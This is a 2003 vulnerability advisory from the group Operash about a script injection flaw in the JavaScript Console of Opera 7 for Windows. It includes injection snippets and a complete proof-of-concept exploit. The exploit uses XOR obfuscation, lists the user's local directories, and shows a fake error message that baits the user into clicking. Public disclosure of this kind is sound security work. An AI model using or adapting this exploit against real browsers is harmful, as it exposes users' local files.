[Opera 7] Yet Another Story of "Phantom of the Opera"

[nesumin <nesumin () softhome net>]

Greetings.
We, :: Operash :: here release the information about vulnerability of Opera.

           _________________________________________________

---------------------------------------------------------------------------------
SYNOPSIS       : [Opera 7] Script Injection Vulnerability in JavaScript Console
                 - Yet another story of "Phantom of the Opera".
PRODUCT        : Opera for Windows
VERSIONS       : 7.10 build 2840
                 7.03 build 2670
                 7.02 build 2668
                 7.02 bork build 2656b
                 7.01 build 2651
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 Access to local disk.
DISCOVERD BY   : :: Operash :: (nesumin)
REPORTED DATE  : 2003-04-25
PUBLISHED DATE : 2003-04-28
----------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

  Opera for Windows is a GUI base Web browser.
  Opera Software ASA (http://www.opera.com/)


1. DESCRIPTION
================

  "JavaScript Console" of Opera 7 that displays the Error Message of JavaScript has
  the vulnerability that allows to inject an arbitrary script in a link.

  This vulnerability can cause an execution of arbitrary script in Local Security Zone (file://)
  when a user opens the link that contains an arbitrary script generated by
  a manipulated error message on the JavaScript Console.

  This is a Security-Hole that makes it possible to leak the data on a User's Local Disk
  to the outside.


2. SYSTEMS AFFECTED
=====================

  Opera 7.10 build 2840
  Opera 7.03 build 2670
  Opera 7.02 build 2668
  Opera 7.02 bork build 2656b
  Opera 7.01 build 2651


3. SYSTEMS NOT AFFECTED
=======================

  ----


4. EXAMINES
=============

  Opera for windows (English/Japanese) :
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.02 bork build 2656b
    Opera 7.01 build 2651

  Platform :
    Windows 98SE Japanese
    Windows 2000 PRO SP3 Japanese


5. TO VENDOR
==============

  Reported (2003/04/25).


6. SOLUTION
==============

  Disable JavaScript.


7. DETAILS
=============

  This vulnerability is caused by script in Opera 7's console.html
  that is not enough to sanitize single-quote.
  It allows to inject an arbitrary script into the link on the JavaScript Console.
  It's possible that an arbitrary script will be infixed into the link
  with the error message including the single-quote like below.


    var message = "http://');alert(location.href+'";
    opera.postError( message );
    location.href = "file://localhost/console.html";

    OUTPUT:

    <a href="javascript:opera.openInSourceViewer('http://&apos;);alert(location.href+'')">***</a>


  Although Opera7.10 has a fix that makes "'" and "&apos;" deleted,
  it's not enough to prevent this vulnerability.
  For instance, if a data like "&#39;" is used instead of "'" like below,
  it is interpreted as "'" in the link and an arbitrary script can be injected.


    var message = "http://&#39;);alert(location.href+&#39;";
    opera.postError( message );
    location.href = "file://localhost/console.html";


  By this vulnerability, if user opens the link on the JavaScript Console,
  the script that can get directory information and read file's content
  from user's local disk is executed on "file://localhost/console.html",


  This vulnerability is related to the vulnerability that has been published
  by GreyMagic Software at 2003-01-29.

    GreyMagic Software - Phantom of the Opera (GM#003-OP)
    http://security.greymagic.com/adv/gm003-op/

  Though that GM#003-OP was issue of double-quote,
  this vulnerability is an issue of single-quote in same part of the script.
  Naturally, vendor should also have checked the case of single-quote
  when GreyMagic Software had reported the double-quote issue to them.
  But they neglected and left it.
  We assume that a deficiency of diligence has brought this issue in its train.


8. SAMPLE CODE
================

  This code generates a link on the JavaScript Console
  to read directory list from local disk "c:\" and display it.

  [1] replace the "script" instead of "Xploit" and save as html file
  [2] upload to WEB server
  [3] open with Opera(enable javascript)
  [4] click a link on the JavaScript Console

    ----------------------------------------------------------------
    <Xploit>
    var depth = 1;
    var startdir = "file://localhost/c:/";

    // arbitrary script
    var evil_script="";
    evil_script += "function dt(dp){\n";
    evil_script += "var i,j,tr,td,b;\n";
    evil_script += "if('complete'==fr.document.readyState&&";
    evil_script += "fr.document.getElementsByTagName('base').item(0)){\n";
    evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='<hr>\\n'";
    evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
    evil_script += "b+='<br>\\n'+'Count : '+tr.length+'<br>\\n';\n";
    evil_script += "for(i=1;i<tr.length;++i){\n";
    evil_script += "td = tr.item(i).getElementsByTagName('td');\n";
    evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
    evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
    evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";
    evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
    evil_script += "for (j=0;j<4;++j)b+=td.item(j).innerText+' ';";
    evil_script += "b+='<br>\\n';}tree.innerHTML+=b;\n";
    evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}\n";
    evil_script += "setTimeout('dt('+dp+');',30);}\nvar ds = new Array(),";
    evil_script += "b = document.getElementsByTagName('body').item(0),";
    evil_script += "f = document.createElement('iframe'),";
    evil_script += "d = document.createElement('div');\n";
    evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
    evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
    evil_script += "f.setAttribute('src','"+startdir+"');\n";
    evil_script += "f.setAttribute('id','fr');\n";
    evil_script += "b.appendChild(f);\n";
    evil_script += "dt("+depth+");\n";

    // xor and URLEncode
    evil_script = escape(evil_script.replace(/./g,function(s){
        return(String.fromCharCode(0x80^s.charCodeAt(0)))}));

    var msg = "http://";;

    // fake url
    msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";

    // code
    msg += "&#39;);m=&#39;";
    msg += evil_script;
    msg += "&#39;;eval(unescape(m).replace(/./g,function(s){";
    msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+&#39;\n";

    // fake message
    msg += "\n";
    msg += "Fatal Error !!!!\n\n";
    msg += "  Please click above link.\n"; // :p

    opera.postError(msg);
    //window.open("file://localhost/console.html","","");
    location.href = "file://localhost/console.html";

    </Xploit>
    ----------------------------------------------------------------


9. DISCLAIMER
===============

  a. We cannot guarantee the accuracy of all statements in this information.
  b. We do not anticipate issuing updated versions of this information
     unless there is some material change in the facts.
  c. And we will take no responsibility for any kinds of disadvantages by
     using this information.
  d. Copyright is held by :: Operash :: and relatives.


10. CONTACT, ETC
=================

  :: Operash ::
  [ Unofficial Opera's Bug and Security information site for Japanese people ]

  imagine (Operash Webmaster)
  nesumin <nesumin () softhome net>


  Thanks to :

    melorin
    piso(sexy)


         _________________________________________________


-------
nesumin <nesumin () softhome net>